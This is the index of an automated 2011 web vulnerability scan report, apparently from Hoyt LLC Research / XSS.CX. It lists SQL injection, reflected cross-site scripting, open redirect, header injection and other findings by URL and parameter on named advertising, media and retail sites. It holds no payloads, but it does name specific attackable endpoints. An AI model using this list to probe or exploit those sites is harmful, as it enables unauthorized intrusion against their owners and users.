XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 06:37:31 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search



1. SQL injection

1.1. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

1.3. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

1.4. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter]

1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header]

1.7. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [name of an arbitrarily supplied request parameter]

1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter]

1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter]

2. LDAP injection

2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

2.2. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

3. XPath injection

4. HTTP header injection

4.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1]

4.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]

4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]

4.9. http://c7.zedo.com/utils/ecSet.js [v parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]

5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]

5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]

5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]

5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]

5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]

5.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.8. http://ad.turn.com/server/pixel.htm [sp parameter]

5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]

5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]

5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]

5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]

5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]

5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]

5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]

5.19. http://choices.truste.com/ca [c parameter]

5.20. http://choices.truste.com/ca [h parameter]

5.21. http://choices.truste.com/ca [plc parameter]

5.22. http://choices.truste.com/ca [w parameter]

5.23. http://choices.truste.com/ca [zi parameter]

5.24. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

5.25. http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico [REST URL parameter 1]

5.26. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

5.27. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]

5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]

5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]

5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]

5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]

5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]

5.37. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

5.38. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1]

5.39. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1]

5.40. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1]

5.41. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1]

5.42. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

5.43. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1]

5.44. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1]

5.45. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]

5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]

5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]

5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]

5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

5.54. http://pastebin.com/favicon.ico [REST URL parameter 1]

5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1]

5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2]

5.57. http://pastebin.com/i/style.css [REST URL parameter 1]

5.58. http://pastebin.com/i/style.css [REST URL parameter 2]

5.59. http://pastebin.com/trends [REST URL parameter 1]

5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter]

5.61. http://r.turn.com/server/pixel.htm [fpid parameter]

5.62. http://r.turn.com/server/pixel.htm [sp parameter]

5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]

5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]

5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]

5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]

5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]

5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]

5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]

5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]

5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]

5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]

5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]

5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]

5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]

5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]

5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]

5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]

5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]

5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]

5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]

5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]

5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]

5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]

5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]

5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]

5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]

5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]

5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]

5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]

5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]

5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]

5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]

5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]

5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]

5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]

5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]

5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]

5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]

5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]

5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]

5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

5.103. http://serv.adspeed.com/ad.php [ht parameter]

5.104. http://serv.adspeed.com/ad.php [wd parameter]

5.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

5.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

5.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

5.108. http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]

5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]

5.110. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter]

5.111. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter]

5.112. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter]

5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]

5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]

5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]

5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]

5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

6. Flash cross-domain policy

6.1. http://0.gravatar.com/crossdomain.xml

6.2. http://6e8d64.r.axf8.net/crossdomain.xml

6.3. http://a.tribalfusion.com/crossdomain.xml

6.4. http://ad-emea.doubleclick.net/crossdomain.xml

6.5. http://ad.doubleclick.net/crossdomain.xml

6.6. http://ad.turn.com/crossdomain.xml

6.7. http://admeld.adnxs.com/crossdomain.xml

6.8. http://ahome.disney.go.com/crossdomain.xml

6.9. http://ajax.googleapis.com/crossdomain.xml

6.10. http://aperture.displaymarketplace.com/crossdomain.xml

6.11. http://api.ak.facebook.com/crossdomain.xml

6.12. http://b.scorecardresearch.com/crossdomain.xml

6.13. http://bh.contextweb.com/crossdomain.xml

6.14. http://c7.zedo.com/crossdomain.xml

6.15. http://cdn.gigya.com/crossdomain.xml

6.16. http://cdn.turn.com/crossdomain.xml

6.17. http://cdn5.tribalfusion.com/crossdomain.xml

6.18. http://ctix8.cheaptickets.com/crossdomain.xml

6.19. http://d.xp1.ru4.com/crossdomain.xml

6.20. http://dar.youknowbest.com/crossdomain.xml

6.21. http://feeds.delicious.com/crossdomain.xml

6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml

6.23. http://fls.doubleclick.net/crossdomain.xml

6.24. http://gannett.gcion.com/crossdomain.xml

6.25. http://gscounters.gigya.com/crossdomain.xml

6.26. http://i.w55c.net/crossdomain.xml

6.27. http://ib.adnxs.com/crossdomain.xml

6.28. http://idcs.interclick.com/crossdomain.xml

6.29. http://js.revsci.net/crossdomain.xml

6.30. http://metrics.fingerhut.com/crossdomain.xml

6.31. http://metrics.mcafee.com/crossdomain.xml

6.32. http://metrics.sonystyle.com/crossdomain.xml

6.33. http://metrics.us.playstation.com/crossdomain.xml

6.34. http://nexus2.ensighten.com/crossdomain.xml

6.35. http://p.brilig.com/crossdomain.xml

6.36. http://pix04.revsci.net/crossdomain.xml

6.37. http://pixel.33across.com/crossdomain.xml

6.38. http://pixel.invitemedia.com/crossdomain.xml

6.39. http://r.turn.com/crossdomain.xml

6.40. http://secure-us.imrworldwide.com/crossdomain.xml

6.41. http://serv.adspeed.com/crossdomain.xml

6.42. http://sony.links.channelintelligence.com/crossdomain.xml

6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml

6.44. http://sony.tcliveus.com/crossdomain.xml

6.45. http://sony.tt.omtrdc.net/crossdomain.xml

6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml

6.47. http://sync.mathtag.com/crossdomain.xml

6.48. http://t.invitemedia.com/crossdomain.xml

6.49. http://tags.bluekai.com/crossdomain.xml

6.50. http://ttwbs.channelintelligence.com/crossdomain.xml

6.51. http://turn.nexac.com/crossdomain.xml

6.52. http://usatoday1.112.2o7.net/crossdomain.xml

6.53. http://w88.go.com/crossdomain.xml

6.54. http://webtrends.telegraph.co.uk/crossdomain.xml

6.55. http://www.viddler.com/crossdomain.xml

6.56. http://adadvisor.net/crossdomain.xml

6.57. http://api.tweetmeme.com/crossdomain.xml

6.58. http://content.usatoday.com/crossdomain.xml

6.59. http://contextweb.usatoday.net/crossdomain.xml

6.60. http://cookex.amp.yahoo.com/crossdomain.xml

6.61. http://dcl.wdpromedia.com/crossdomain.xml

6.62. http://dcl2.wdpromedia.com/crossdomain.xml

6.63. http://disneycruise.disney.go.com/crossdomain.xml

6.64. http://feeds.bbci.co.uk/crossdomain.xml

6.65. http://googleads.g.doubleclick.net/crossdomain.xml

6.66. http://i.usatoday.net/crossdomain.xml

6.67. http://images.scanalert.com/crossdomain.xml

6.68. http://imawow.weather.com/crossdomain.xml

6.69. http://login.dotomi.com/crossdomain.xml

6.70. http://newsrss.bbc.co.uk/crossdomain.xml

6.71. http://optimized-by.rubiconproject.com/crossdomain.xml

6.72. http://pagead2.googlesyndication.com/crossdomain.xml

6.73. http://pubads.g.doubleclick.net/crossdomain.xml

6.74. http://s7d5.scene7.com/crossdomain.xml

6.75. http://static.ak.fbcdn.net/crossdomain.xml

6.76. http://travel.travelocity.com/crossdomain.xml

6.77. http://travel.usatoday.com/crossdomain.xml

6.78. http://webassets.scea.com/crossdomain.xml

6.79. http://wow.weather.com/crossdomain.xml

6.80. http://www.facebook.com/crossdomain.xml

6.81. http://www.fingerhut.com/crossdomain.xml

6.82. https://www.fingerhut.com/crossdomain.xml

6.83. http://www.mcafeesecure.com/crossdomain.xml

6.84. https://www.mcafeesecure.com/crossdomain.xml

6.85. http://www.telegraph.co.uk/crossdomain.xml

6.86. http://www.orbitz.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

7.2. http://ad.doubleclick.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://content.usatoday.com/clientaccesspolicy.xml

7.5. http://contextweb.usatoday.net/clientaccesspolicy.xml

7.6. http://i.usatoday.net/clientaccesspolicy.xml

7.7. http://metrics.fingerhut.com/clientaccesspolicy.xml

7.8. http://metrics.mcafee.com/clientaccesspolicy.xml

7.9. http://metrics.sonystyle.com/clientaccesspolicy.xml

7.10. http://metrics.us.playstation.com/clientaccesspolicy.xml

7.11. http://pixel.33across.com/clientaccesspolicy.xml

7.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.13. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.14. http://w88.go.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://disneycruise.disney.go.com/reservations/customize

8.2. http://localhost:50386/hoyt/Sitefinity/Startup

8.3. http://shoprunner.force.com/content/JsContentElementsGNC

8.4. http://shoprunner.force.com/content/JsContentElementsPET

8.5. http://www.passporterboards.com/forums/

8.6. http://www.viddler.com/file/7d63c65a/html5mobile/

9. XML injection

9.1. http://api.ak.facebook.com/restserver.php [format parameter]

9.2. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 1]

9.3. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 2]

9.4. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 3]

9.5. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 1]

9.6. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 2]

9.7. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 3]

9.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.10. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.11. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

9.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

10. SQL statement in request parameter

10.1. https://store.playstation.com/external/index.vm

10.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

11. Session token in URL

11.1. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard

11.2. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

11.3. http://sales.liveperson.net/hc/71737897/

11.4. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

11.5. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard

11.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

12. SSL certificate

12.1. https://www.mcafeesecure.com/

12.2. https://store.playstation.com/

12.3. https://www.fingerhut.com/

12.4. https://www.sonystyle.com/

13. Password field submitted using GET method

13.1. http://shoprunner.force.com/content/JsContentElementsGNC

13.2. http://shoprunner.force.com/content/JsContentElementsPET

14. Open redirection

14.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 [d parameter]

14.2. http://0.gravatar.com/avatar/6a69081c59ca58f4bb6f7a15970aa073 [d parameter]

14.3. http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/f/8c/%2a/j%3B232796950%3B0-0%3B0%3B56677086%3B3454-728/90%3B38609320/38627077/1%3Bu%3D17918465%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick [REST URL parameter 10]

14.4. http://b.scorecardresearch.com/r [d.c parameter]

14.5. http://bh.contextweb.com/bh/rtset [rurl parameter]

14.6. http://i.w55c.net/ping_match.gif [rurl parameter]

14.7. http://p.brilig.com/contact/bct [REDIR parameter]

14.8. http://pixel.invitemedia.com/pubmatic_sync [pubmatic_callback parameter]

14.9. http://r.nexac.com/e/getdata.xgi [ru parameter]

14.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

14.11. http://sync.mathtag.com/sync/img [redir parameter]

15. Cookie scoped to parent domain

15.1. http://eval.bizrate.com/js/survey_126457_1.js

15.2. http://sony.links.origin.channelintelligence.com/pages/wl.asp

15.3. http://ttwbs.channelintelligence.com/

15.4. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

15.5. http://a.tribalfusion.com/j.ad

15.6. http://action.media6degrees.com/orbserv/hbpix

15.7. http://ad.turn.com/server/ads.js

15.8. http://ad.turn.com/server/pixel.htm

15.9. http://admeld.adnxs.com/usersync

15.10. http://ads.revsci.net/adserver/ako

15.11. http://adserver.veruta.com/track.fcgi

15.12. http://ak1.abmr.net/is/images3.pacsun.com

15.13. http://ak1.abmr.net/is/tag.admeld.com

15.14. http://ak1.abmr.net/is/tag.contextweb.com

15.15. http://ak1.abmr.net/is/www.imiclk.com

15.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

15.17. http://b.scorecardresearch.com/b

15.18. http://b.scorecardresearch.com/r

15.19. http://bh.contextweb.com/bh/rtset

15.20. http://c7.zedo.com/utils/ecSet.js

15.21. http://cw-m.d.chango.com/m/cw

15.22. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

15.23. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

15.24. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

15.25. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

15.26. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

15.27. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

15.28. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

15.29. http://data.adsrvr.org/map/cookie/contextweb

15.30. http://disneycruise.disney.go.com/reservations/customize

15.31. http://f.nexac.com/e/a-677/s-2140.xgi

15.32. http://https.edge.ru4.com/smartserve/ad

15.33. http://i.w55c.net/ping_match.gif

15.34. http://ib.adnxs.com/getuid

15.35. http://ib.adnxs.com/getuidnb

15.36. http://ib.adnxs.com/seg

15.37. http://id.google.com/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif

15.38. http://id.google.com/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif

15.39. http://id.google.com/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif

15.40. http://idcs.interclick.com/Segment.aspx

15.41. http://idpix.media6degrees.com/orbserv/hbpix

15.42. http://image2.pubmatic.com/AdServer/Pug

15.43. http://js.revsci.net/gateway/gw.js

15.44. http://leadback.advertising.com/adcedge/lb

15.45. http://media.fastclick.net/w/tre

15.46. http://odb.outbrain.com/utils/get

15.47. http://odb.outbrain.com/utils/ping.html

15.48. http://optimized-by.rubiconproject.com/a/dk.js

15.49. http://p.brilig.com/contact/bct

15.50. http://pix04.revsci.net/D08734/a1/0/0/0.gif

15.51. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js

15.52. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js

15.53. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

15.54. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js

15.55. http://pixel.33across.com/ps/

15.56. http://pixel.invitemedia.com/data_sync

15.57. http://pixel.mathtag.com/event/img

15.58. http://pixel.quantserve.com/pixel

15.59. http://pixel.rubiconproject.com/tap.php

15.60. http://pixel.rubiconproject.com/tap.php

15.61. http://r.openx.net/set

15.62. http://r.turn.com/r/bd

15.63. http://r.turn.com/r/beacon

15.64. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

15.65. http://r.turn.com/server/pixel.htm

15.66. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

15.67. http://segment-pixel.invitemedia.com/pixel

15.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

15.69. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css

15.70. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css

15.71. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

15.72. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

15.73. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

15.74. http://sync.mathtag.com/sync/img

15.75. http://t.invitemedia.com/track_imp

15.76. http://tag.contextweb.com/TagPublish/getad.aspx

15.77. http://tags.bluekai.com/site/2948

15.78. http://tags.bluekai.com/site/3358

15.79. http://www.imiclk.com/cgi/r.cgi

15.80. http://www.mcafeesecure.com/ads/1002/25

15.81. http://www.passporterboards.com/forums/

16. Cookie without HttpOnly flag set

16.1. http://disneycruise.disney.go.com/reservations/customize

16.2. http://eval.bizrate.com/js/survey_126457_1.js

16.3. http://ots.optimize.webtrends.com/ots/ots/js-3.

16.4. http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43

16.5. http://shop.pacsun.com/

16.6. http://sony.links.origin.channelintelligence.com/pages/wl.asp

16.7. http://ttwbs.channelintelligence.com/

16.8. http://us.playstation.com/uwps/TickerMessages

16.9. http://www.fingerhut.com/

16.10. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp

16.11. http://www.fingerhut.com/includes/financial_snapshot.jsp

16.12. http://www.fingerhut.com/js/config_dhtml.jsp

